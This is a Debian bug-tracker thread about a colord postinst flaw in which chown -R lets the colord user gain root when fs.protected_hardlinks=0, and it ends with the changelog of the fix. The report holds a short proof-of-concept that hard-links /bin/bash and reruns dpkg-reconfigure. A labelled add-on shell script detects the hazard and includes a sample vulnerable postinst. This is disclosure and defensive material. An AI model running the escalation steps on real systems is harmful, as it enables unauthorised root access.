Report forwarded
to debian-bugs-dist@lists.debian.org, Christopher James Halse Rogers <raof@ubuntu.com>: Bug#889060; Package colord.
(Thu, 01 Feb 2018 16:18:07 GMT).
Acknowledgement sent
to Ansgar Burchardt <ansgar@debian.org>:
New Bug report received and forwarded. Copy sent to Christopher James Halse Rogers <raof@ubuntu.com>.
(Thu, 01 Feb 2018 16:18:07 GMT).
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0
Date: Thu, 01 Feb 2018 17:16:09 +0100
Package: colord
Version: 1.3.3-2
Severity: important
Tags: security
On systems with fs.protected_hardlinks=0 the postinst script allows
escalation from the colord user to root:
+---
| # sysctl fs.protected_hardlinks=0
| # runuser -u colord ln /bin/bash /var/lib/colord/bash
| # ls -l /bin/bash
| -rwxr-xr-x 2 root root 1099016 May 15 2017 /bin/bash
| # dpkg-reconfigure colord
| # ls -l /bin/bash
| -rwxr-xr-x 2 colord colord 1099016 May 15 2017 /bin/bash
+---
This is essentially the same problem as CVE-2017-18078.
Ansgar
(now hoping every other `chmod -R` call gets a CVE assigned)
Information forwarded
to debian-bugs-dist@lists.debian.org, Christopher James Halse Rogers <raof@ubuntu.com>: Bug#889060; Package colord.
(Fri, 02 Feb 2018 08:21:06 GMT).
Acknowledgement sent
to Chris Lamb <lamby@debian.org>:
Extra info received and forwarded to list. Copy sent to Christopher James Halse Rogers <raof@ubuntu.com>.
(Fri, 02 Feb 2018 08:21:06 GMT).
Subject: Re: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0
Date: Fri, 02 Feb 2018 13:49:12 +0530
Hi Ansgar,
> now hoping every other `chmod -R` call gets a CVE assigned
See #889066 for a Lintian check for this.
Regards,
--
,''`.
: :' : Chris Lamb
`. `'` lamby@debian.org / chris-lamb.co.uk
`-
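As an added example (not part of the bug report, the reply, or the colord package), a POSIX shell helper set covering both the hazard Ansgar demonstrates (a hard link the service user created inside a directory that `chown -R` later walks) and the kind of maintainer-script scan Chris's Lintian reference points at. The sample postinst it writes is constructed, and the grep pattern is this example's own, not Lintian's.

```shell
#!/bin/sh
# Added example, not code from the bug report or the colord package: checks a
# maintainer script could run before changing ownership under a directory the
# service user can write to. With fs.protected_hardlinks=0 a file there may be
# a hard link to a root-owned binary, and `chown -R` then changes the owner of
# that shared inode (the colord.postinst case in the report above).

# Print 1, 0 or unknown (sysctl not readable, e.g. a non-Linux host).
protected_hardlinks_state() {
    cat /proc/sys/fs/protected_hardlinks 2>/dev/null || echo unknown
}

# Regular files under $1 with more than one link, staying on one filesystem.
# Every name of a multiply linked inode is listed, so one extra link = two paths.
hardlinked_files() {
    find "$1" -xdev -type f -links +1 2>/dev/null
}

# Number of such paths; a postinst should refuse a recursive chown when > 0.
hardlinked_count() {
    hardlinked_files "$1" | wc -l | tr -d ' '
}

# Lines of a maintainer script ($1) that run chown/chmod/chgrp recursively,
# in the spirit of the Lintian check from the thread (pattern is this example's).
recursive_chown_lines() {
    grep -nE '(chown|chmod|chgrp)[[:space:]].*(-R|--recursive)' "$1"
}

# What the 1.4.3-1 fix amounts to: change the directory itself, not its
# contents, so links the service user planted inside are never touched.
safe_chown_dir() {
    chown -- "$2" "$1"
}

# Constructed sample postinst (not the real colord one); prints the path of
# the temporary file it wrote so the scan above can be tried on it.
sample_postinst_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
#!/bin/sh
chown -R colord:colord /var/lib/colord
chmod 0755 /var/lib/colord
chown --recursive colord /var/lib/colord/icc
EOF
    echo "$f"
}
```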
Reply sent
to Christopher James Halse Rogers <raof@ubuntu.com>:
You have taken responsibility.
(Thu, 06 Sep 2018 18:06:10 GMT).
Notification sent
to Ansgar Burchardt <ansgar@debian.org>:
Bug acknowledged by developer.
(Thu, 06 Sep 2018 18:06:10 GMT).
From: Christopher James Halse Rogers <raof@ubuntu.com>
To: 889060-close@bugs.debian.org
Subject: Bug#889060: fixed in colord 1.4.3-1
Date: Thu, 06 Sep 2018 18:04:00 +0000
Source: colord
Source-Version: 1.4.3-1
We believe that the bug you reported is fixed in the latest version of
colord, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 889060@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Christopher James Halse Rogers <raof@ubuntu.com> (supplier of updated colord package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Mon, 03 Sep 2018 17:53:23 +1000
Source: colord
Binary: libcolord-dev libcolord2 colord colord-sensor-argyll colord-data gir1.2-colord-1.0 libcolorhug-dev libcolorhug2 gir1.2-colorhug-1.0
Architecture: source
Version: 1.4.3-1
Distribution: unstable
Urgency: medium
Maintainer: Christopher James Halse Rogers <raof@ubuntu.com>
Changed-By: Christopher James Halse Rogers <raof@ubuntu.com>
Description:
colord - system service to manage device colour profiles -- system daemon
colord-data - system service to manage device colour profiles -- data files
colord-sensor-argyll - system service to manage device colour profiles -- argyll sensor
gir1.2-colord-1.0 - GObject introspection data for the colord library
gir1.2-colorhug-1.0 - GObject introspection data for the colorhug library
libcolord-dev - system service to manage device colour profiles -- development fi
libcolord2 - system service to manage device colour profiles -- runtime
libcolorhug-dev - library to access the ColorHug colourimeter -- development files
libcolorhug2 - library to access the ColorHug colourimeter -- runtime
Closes: 815252 889060 895102
Changes:
colord (1.4.3-1) unstable; urgency=medium
.
* New upstream version 1.4.3
- Switch to meson build system
- New upstream version respects SOURCE_DATE_EPOCH for generated
profiles, making the build reproducible! (Closes: 815252)
* Switch to dh_missing
* Fix order of adduser arguments in colord.postinst (Closes: 895102)
* Drop chown -R usage in colord.postinst (Closes: 889060)
* Refresh symbols files
* Refresh .install files
* debian/watch: Correctly identify as a Version=4 file.
* Bump Standards-Version
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Wed, 05 Jun 2019 08:12:50 GMT).